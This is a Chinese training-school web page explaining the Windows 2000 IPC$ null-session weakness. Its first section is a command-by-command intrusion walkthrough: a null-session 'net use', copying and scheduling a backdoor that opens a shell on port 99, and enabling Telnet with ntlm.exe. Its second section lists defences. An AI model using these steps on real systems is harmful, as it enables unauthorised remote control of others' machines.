<menu id="a2esi"><strong id="a2esi"></strong></menu>
  • <nav id="a2esi"></nav>
    學校總部  | 設為首頁 | 加入收藏 | 官方微信
    內威培訓
    打造“培訓+就業”一站式服務品牌!
    banner1
    • Python+AI工程師
    • Web前端工程師
    • Java軟件開發工程師

    首頁>>學員天地

    什么是IPC漏洞和空連接
    編輯:simon  閱讀:3911次  發布:11-02-28
    IPC是共享“命名管道”的資源,它對于程序間的通訊很重要。在遠程管理計算機和查看計算機的共享資源時使用。利用IPC我們可以與目標主機建立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們還可以得到目標主機上的用戶列表。但是,一些別有用心者會利用IPC,查找我們的用戶列表,并使用一些字典工具,對我們的主機進行攻擊。

    一、如何利用IPC漏洞
        攻擊者在這里一般會用到《流光》這個軟件,兔子在這里特別提醒你,《流光》是一款功能非常強大的軟件,在我們使用時一定要注意,不得進行非法破壞!
        第一步:運行《流光》(現在的最新版本是4.6),按“CTRL+R”鍵彈出掃描框,我們這里只是做個測試,目的是告訴大家這個漏洞的危害,所以我們現在隨便選擇一段IP進行掃描。我們掃描的是127.0.0.1(如圖),其它的均使用默認,不需要改變設置。
        第二步:大家打開Win2000自帶的命令提示行,注:這里我們不是教大家怎么破壞,只是給大家介紹這個漏洞的危害,所以下面的IP是假設的,并不存在。
        1. C:\>net use \\127.0.0.1\IPC "" /user:"admintitrators" 。這就是剛才用《流光》掃到的用戶名是administrators,密碼為“空”的IP地址,如果是攻擊者的話,他就會用這樣的命令來與127.0.0.1建立一個連接,因為密碼為“空”,所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
        2. C:\>copy srv.exe \\127.0.0.1\admin。先復制srv.exe上去,在流光的Tools目錄下就有(這里的是指admin用戶的c:\winnt\system32\,大家還可以使用c、d,意思是C盤與D盤,這看你要復制到什么地方去了)。
        3. C:\>net time \\127.0.0.1 。查查時間,發現127.0.0.1的當前時間是2002/3/19上午11:00,命令成功完成。
        4. C:\>at \\127.0.0.1 11:05 srv.exe。用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)
        5. C:\>net time \\127.0.0.1
         再查查到時間沒有?如果127.0.0.1的當前時間是2002/3/19上午11:05,那就準備開始下面的命令。
        6. C:\>telnet 127.0.0.1 99。這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
        雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
        7.C:\>copy ntlm.exe \\127.0.0.1\admin。用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
        8. C:\WINNT\system32>ntlm。輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現“DONE”的時候,就說明已經啟動正常。然后使用“net start telnet”來開啟Telnet服務!

        第三步:我們使用Telnet到對方計算機上去,Telnet 127.0.0.1,接著輸入用戶名與密碼就進入了,操作就像在DOS上操作一樣簡單!

    二、如何防范IPC漏洞
        看了上面的方法是不是覺得該檢測一下自己是否有這個漏洞,如果有,還不趕快把這個漏洞給補上?跟我來吧,下面我們將教你如何防范IPC漏洞的入侵
        1.禁止建立空連接。我們首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001。
        2.禁止管理共享。同樣也是找到如下組鍵[HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer = DWORD的鍵值改為:00000000。
        3.到www.heibai.net/download/show.php?id=2194&down=1下載delshare.zip。該工具能自動永久刪除Windows 2000所有默認共享的兩個批處理文件。
        4.如果還覺得麻煩的話,也可以把“net share ipc /delete”放進你的啟動欄里。
        5.當然,最簡單的方法就是把的密碼設置得復雜一些,以免被一些不懷好意的人使用工具破解出來。不過想提醒大家一點,任何復雜的密碼都有可能被破解。

    上一篇: 網頁中植入木馬的幾種方法   下一篇: 怎樣才能學好linux?
    返回列表
    網絡大專、自考本科,學歷輕松拿!
    ©2016-2020 上海內威職業技能培訓學校 版權所有
    普陀區武寧路1500號中樓2-3層(郵編:200062)
    咨詢:021-62434966  合作:021-13371929650  就業:021-62434966  傳真:  電郵:service@snetway.com
    《中華人民共和國電信與信息服務業務》經營許可證滬ICP備15002602號 
    <menu id="a2esi"><strong id="a2esi"></strong></menu>
  • <nav id="a2esi"></nav>
    本溪娱网棋牌